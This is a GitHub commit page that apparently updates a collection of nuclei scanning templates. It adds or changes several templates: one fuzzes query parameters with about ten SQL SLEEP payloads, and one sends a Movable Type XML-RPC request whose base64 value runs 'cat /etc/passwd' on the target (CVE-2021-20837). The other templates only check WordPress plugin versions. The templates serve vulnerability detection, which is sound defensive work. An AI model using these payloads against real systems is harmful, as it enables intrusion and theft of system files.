Skip to content

Commit

Permalink
20240829
Browse files Browse the repository at this point in the history
  • Loading branch information
@actions-user
actions-user committed Aug 29, 2024
1 parent 0a55daf commit 97eb6f5
Show file tree
Hide file tree
Showing 123 changed files with 6,159 additions and 511 deletions.
2 changes: 1 addition & 1 deletion date.txt
View file
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240828
20240829
93 changes: 93 additions & 0 deletions poc.txt
View file

Large diffs are not rendered by default.

66 changes: 33 additions & 33 deletions poc/auth/BlindSQLAuth.yaml
View file
Original file line number Diff line number Diff line change
@@ -1,33 +1,33 @@
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: KhukuriRimal
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
- "XOR(if(now()=sysdate(),sleep(7),0))XOR"
- "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "duration>=7 && duration <=16"
condition: and
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: Coffinxp/lostsec
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'%2b(select*from(select(sleep(7)))a)%2b'"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
- "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
fuzzing:
- part: query
type: replace
mode: single
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "duration>=7 && duration <=16"
43 changes: 31 additions & 12 deletions poc/cve/CVE-2021–20837.yaml
View file
Original file line number Diff line number Diff line change
@@ -1,23 +1,42 @@
id: CVE-2021-20837

info:
name: RCE in MovableType
author: zin_min_phyo
severity: critical
reference: https://nemesis.sh/posts/movable-type-0day/
tags: MovableType,RCE
name: Movable Type XMLRPC API vulnerable to OS command injection
author: Min Won
description: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Crd --> Orginal Researcher..
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-20837
severity: high
tags: cve,cve2021,rce

requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi"
- raw:
- |
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: POC
Accept: */*
Content-Length: 198
Connection: close
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
YGNhdCAvZXRjL3Bhc3N3ZGA=
</base64>
</value>
</param>
</params>
</methodCall>
body: '<?xml version="1.0"?><methodCall><methodName>mt.handler_to_coderef</methodName><params><param><value><base64>YGNhdCAvZXRjL3Bhc3N3ZGA=</base64></value></param></params></methodCall>'



matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body

59 changes: 59 additions & 0 deletions poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097

info:
name: >
Theme Editor <= 2.8 - Authenticated (Admin+) PHAR Deserialization
author: topscoder
severity: low
description: >
The Theme Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'images_array' parameter in versions up to, and including 2.8. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/88fe46bf-8e85-4550-92ad-bdd426e5a745?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-2440
metadata:
fofa-query: "wp-content/plugins/theme-editor/"
google-query: inurl:"/wp-content/plugins/theme-editor/"
shodan-query: 'vuln:CVE-2022-2440'
tags: cve,wordpress,wp-plugin,theme-editor,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/theme-editor/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "theme-editor"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.8')
59 changes: 59 additions & 0 deletions poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e

info:
name: >
Product Specifications for Woocommerce <= 0.6.0 - Reflected Cross-Site Scripting via Arbitrary Query String Parameter
author: topscoder
severity: medium
description: >
The Product Specifications for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the arbitrary query string parameters in versions up to, and including, 0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/916d4f2f-769b-4902-9464-f55d8f64c9d2?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-46858
metadata:
fofa-query: "wp-content/plugins/product-specifications/"
google-query: inurl:"/wp-content/plugins/product-specifications/"
shodan-query: 'vuln:CVE-2022-46858'
tags: cve,wordpress,wp-plugin,product-specifications,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/product-specifications/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "product-specifications"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 0.6.0')
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad

info:
name: >
Funnel Kit Funnel Builder PRO <= 3.4.5 Authenticated(Contributor+) Stored Cross-Site Scripting via allow_iframe_tag_in_post
author: topscoder
severity: low
description: >
The FunnelKit Funnel Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'allow_iframe_tag_in_post' function which uses the 'wp_kses_allowed_html' filter to globally allow script and iframe tags in posts in all versions up to, and including, 3.4.5. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/2fbacaf2-0b3e-4d1e-adc3-c501a6c4c816?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
cvss-score: 6.4
cve-id: CVE-2024-1056
metadata:
fofa-query: "wp-content/plugins/funnel-builder-pro/"
google-query: inurl:"/wp-content/plugins/funnel-builder-pro/"
shodan-query: 'vuln:CVE-2024-1056'
tags: cve,wordpress,wp-plugin,funnel-builder-pro,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/funnel-builder-pro/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "funnel-builder-pro"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 3.4.5')
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e

info:
name: >
Premium Portfolio Features for Phlox theme <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'aux_recent_portfolios_grid' shortcode in all versions up to, and including, 2.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/4475cbd4-07cf-499a-a11a-b63eb9184568?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
cvss-score: 6.4
cve-id: CVE-2024-1384
metadata:
fofa-query: "wp-content/plugins/auxin-portfolio/"
google-query: inurl:"/wp-content/plugins/auxin-portfolio/"
shodan-query: 'vuln:CVE-2024-1384'
tags: cve,wordpress,wp-plugin,auxin-portfolio,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/auxin-portfolio/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "auxin-portfolio"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.3.3')
Loading

0 comments on commit 97eb6f5

Please sign in to comment.